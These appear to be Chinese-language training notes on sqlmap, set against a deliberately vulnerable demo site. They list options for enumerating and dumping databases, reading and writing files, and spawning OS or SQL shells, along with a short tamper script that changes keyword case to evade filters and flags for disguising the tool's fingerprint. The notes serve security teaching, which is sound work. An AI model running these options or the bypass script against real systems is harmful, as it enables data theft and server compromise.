演示案例:
- 数据猜解-库表列数据&字典
- 权限操作-文件&命令&交互式
- 提交方法-POST&HEAD&JSON
- 绕过模块-Tamper脚本-使用&开发
- 分析拓展-代理&调试&指纹&风险&等级
#参考:
https://www.cnblogs.com/bmjoker/p/9326258.html
#数据猜解-库表列数据&字典
测试:http://vulnweb.com/
--current-db
--tables -D ""
--columns -T "" -D ""
--dump -C "" -C "" -T ""
#权限操作-文件&命令&交互式
测试:MYSQL高权限注入
引出权限:
--is-dba --privileges
引出文件:
--file-read --file-write --file-dest
引出命令:
--os-cmd= --os-shell --sql-shell
#提交方法-POST&HEAD&JSON
测试:Post Cookie Json
--data ""
--cookie ""
-r 1.txt
#绕过模块-Tamper脚本-使用&开发
测试:base64注入 有过滤的注入
--tamper=base64encode.py
--tamper=test.py
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
if payload:
payload = payload.replace('SELECT','sElEct')
payload = payload.replace('OR','Or')
payload = payload.replace('AND','And')
payload = payload.replace('SLEEP','SleeP')
payload = payload.replace('ELT','Elt')
return payload
#分析拓展-代理&调试&指纹&风险&等级
1、后期分析调试:
-v=(0-6) #详细的等级(0-6)
--proxy "http://xx:xx" #代理注入
2、打乱默认指纹:
--user-agent "" #自定义user-agent
--random-agent #随机user-agent
--time-sec=(2,5) #延迟响应,默认为5
3、使用更多的测试:测试Header注入
--level=(1-5) #要执行的测试水平等级,默认为1
--risk=(0-3) #测试执行的风险等级,默认为1
涉及资源:
补充:涉及录像课件资源软件包资料等下载地址